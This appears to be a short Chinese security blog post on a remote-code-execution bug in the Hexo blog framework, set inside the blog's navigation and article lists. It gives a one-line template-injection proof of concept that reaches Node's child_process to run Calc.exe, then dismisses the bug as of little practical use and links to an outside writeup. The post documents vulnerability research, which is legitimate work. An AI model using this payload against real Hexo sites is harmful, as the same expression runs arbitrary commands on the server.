avatar
文章
64
标签
27
分类
0

主页
web安全
  • 渗透测试
  • 代码审计
  • 漏洞复现
  • 红蓝对抗
  • java安全
CTF
  • web
  • misc
  • crypto
  • re
友链
留言板
关于笔者
c0ll4r
搜索
主页
web安全
  • 渗透测试
  • 代码审计
  • 漏洞复现
  • 红蓝对抗
  • java安全
CTF
  • web
  • misc
  • crypto
  • re
友链
留言板
关于笔者

hexo的rce

发表于2023-11-26|更新于2023-12-07
|字数总计:80|阅读时长:1分钟

{{joiner.constructor(“global.process.mainModule.require(‘child_process’).exec(‘Calc.exe’)”)() }}

很鸡肋的洞,不能直接带来啥大的危害。

https://gem-love.com/2023/07/25/hexo%E5%8D%9A%E5%AE%A2%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E5%92%8C%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/

poc
上一篇
metinfo5.0.4 RCE
下一篇
我的新博客
相关推荐
2023-12-05
metinfo5.0.4 RCE
2023-12-20
cve-2017-8046 springboot中PATCH方法rce
2024-01-06
一次黑盒rce到白盒sql注入
2023-12-20
暗月中秋月饼争夺战靶场
2024-06-20
某次黑盒rce
2024-01-02
某调度系统的rce
avatar
c0ll4r
文章
64
标签
27
分类
0
公告
Email:root@pwns.fun
最新文章
上帝给你关了一扇门,他会打开一扇窗2025-05-01
红日32025-03-10
靶机-ORASI: 12025-02-25
darkhole_2靶机2025-02-22
vulnhub_Web-Machine-N72025-02-17
©2020 - 2025 By c0ll4r
框架 Hexo|主题 Butterfly
湘ICP备2023001513号 湘公网安备 43310102000328号
搜索
数据库加载中